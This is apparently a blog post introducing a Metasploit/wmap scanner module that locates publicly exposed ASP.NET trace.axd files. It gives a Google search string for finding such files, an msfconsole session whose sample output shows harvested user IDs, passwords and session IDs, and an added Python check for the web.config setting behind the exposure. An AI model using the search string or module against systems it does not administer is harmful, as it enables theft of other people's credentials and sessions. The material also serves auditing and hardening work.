This is a nice and easy way to get user credentials and other important information from .NET applications where the programmer has been really clumsy, careless or lazy. Basically, the whole problem starts when a specific web page is configured to trace the requests made by clients. All these requests are saved to the file trace.axd. However, the problem is not configuring web pages to log client requests; the real problem is allowing access to the trace.axd file from the Internet. I know, it just sounds stupid to allow this kind of remote access to this file, but you would be surprised how many programmers forget to remove this access and only allow read access locally. In case you just want to take a look at what kind of information you would find in a trace.axd file, I suggest a Google search, for example:
"Requests to this Application" inurl:trace.axd
OK. Now that this is explained: I developed a small metasploit/wmap module that will look for trace.axd files available on a specific target and print the sensitive information in the msfconsole. Obviously I took another module as a template and started from there.
The following is an example of how to use this module:
=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 320 exploits - 99 auxiliary
+ -- --=[ 217 payloads - 20 encoders - 6 nops
=[ svn r8140 updated 14 days ago (2010.01.16)
msf > use auxiliary/scanner/http/trace_axd
msf auxiliary(trace_axd) > show options
Module options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
PATH     /                yes       The test path to find trace.axd file
Proxies                   no        Use a proxy chain
RHOSTS                    yes       The target address range or CIDR identifier
RPORT    80               yes       The target port
THREADS  1                yes       The number of concurrent threads
VHOST                     no        HTTP server virtual host
msf auxiliary(trace_axd) > set RHOSTS example.com
RHOSTS => example.com
msf auxiliary(trace_axd) > set PATH /path/
PATH => /path/
msf auxiliary(trace_axd) > run
.
.
.
http(s)://host_ip/path/Trace.axd?id=1
[*] User ID: user_id
[*] Password: pass
[*] Physical Path: \Inetpub\wwwroot\lalala
[*] Session ID: sgwz55xnci4145ahzbas
[*] Local Address: 10.168.10.180
[*] Headers: HEADERS
[*]
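The output above is what an exposed trace.axd hands to anyone on the Internet. As an added example (not part of the original post or of the wmap module), here is a defender-side check in Python: it audits the <trace> element of an ASP.NET web.config for the setting that causes this exposure, and classifies a response fetched from /trace.axd on your own server by the "Requests to this Application" page title used in the search above. The web.config samples are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Constructed sample: the dangerous setting (trace.axd served to any client).
VULNERABLE_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <trace enabled="true" localOnly="false" pageOutput="false" requestLimit="40" />
  </system.web>
</configuration>"""

# Constructed sample: hardened setting (trace.axd answered only to localhost).
HARDENED_WEB_CONFIG = """<configuration>
  <system.web>
    <trace enabled="true" localOnly="true" />
  </system.web>
</configuration>"""


def audit_trace_config(web_config_xml):
    """Return (remote_exposure, message) for <system.web><trace> in a web.config.

    ASP.NET defaults: a missing <trace> element or enabled="false" means
    trace.axd returns an error page; localOnly defaults to "true".
    """
    root = ET.fromstring(web_config_xml)
    trace = root.find("./system.web/trace")
    if trace is None:
        return False, "no <trace> element: tracing disabled by default"
    enabled = trace.get("enabled", "false").strip().lower() == "true"
    local_only = trace.get("localOnly", "true").strip().lower() == "true"
    if not enabled:
        return False, "tracing disabled"
    if local_only:
        return False, "tracing enabled, but trace.axd is served to localhost only"
    return True, ('trace.axd reachable remotely (request log with headers, session '
                  'IDs and form fields): set localOnly="true" or enabled="false"')


def looks_like_trace_listing(status_code, body):
    """Classify a response fetched from /trace.axd on a host you administer:
    True when the trace request listing came back instead of an error page."""
    return status_code == 200 and "Requests to this Application" in body


if __name__ == "__main__":
    for name, cfg in (("vulnerable", VULNERABLE_WEB_CONFIG),
                      ("hardened", HARDENED_WEB_CONFIG)):
        exposed, msg = audit_trace_config(cfg)
        print(f"{name}: remote_exposure={exposed} ({msg})")
```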
Again, I hope this helps someone. If you want to run this module along with the other wmap modules, please look at the crawler post in this same blog or the wmap documentation. Basically you just have to browse using a proxy and load the db_wmap module.
c4an.